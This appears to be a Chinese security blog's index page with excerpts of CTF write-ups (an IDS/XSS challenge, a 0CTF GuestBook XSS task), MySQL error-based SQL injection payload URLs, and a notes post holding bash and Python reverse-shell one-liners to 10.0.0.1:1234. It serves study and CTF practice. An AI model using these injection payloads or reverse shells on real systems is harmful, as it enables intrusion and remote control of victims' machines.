##IDS-Chicken Writeup(CCTF) 感觉这题也没多少菊苣想撸所以就写一个writeup mark一下 题目想法来自与detectify实验室的一篇Bypass CSP的paper和某公司IDS系统报警存在xss而拼凑成的题目 paper点我 题目一开始的注入其实只是一个烟雾 主要作用是通过触发Mysql Error从而记录到IDS报警消息中 根据Hint 我们要扫一波目录 可以成功跑到 http://ids.c-chicken.cc/upload/ http://ids.c-chicken.cc/upload.php http://ids.c-chicken.cc/conn.php http://ids.c-chicken.cc/index.php...

##0CTF Web WriteUp ###GuestBook 题目很明显的提示要获取httponly下的cookie 所以想到的是构造一个xss盲打 根据show.php返回的内容 <html> <body> <script>var debug=false;</script> <div id="xx"> <h2>xx</h2> </div> <div id="text"></div> <script> data = "xxx" t = document.getElementById("text")...

##Find Url In Apk 自己根据自己的需要写了一个小工具 提取App里面的url 或许对!@$@@!有一些帮助~ Find Url In Apk

Mysql 报错注入 Mysql 报错注入 数据库结构 php源码参考RickGray’Blog ###1 floor() Example Show Version() http://0.0.0.0:8001/test.php?name=aa'and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23&pass=1 Show Databases http://0.0.0.0:8001/test.php?name=aa' AND (SELECT 3904...

本来是笔记本的东西 正好整理成MarkDown格式 就手抖push了一下 ###反弹Shell Bash bash -i >& /dev/tcp/10.0.0.1/1234 0>&1 Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'...

Linux Penetration layout: post title: “Linux Penetration” description: “Hacking” headline: modified: 2015-11-20 category: Hacking tags: [Hacking] imagefeature: mathjax: chart: comments: true featured: true — Linux Penetration 反弹Shell About SSH About Information 操作系统 内核版本 网络相关 环境变量 查看进程服务 找出root权限进程 :) ...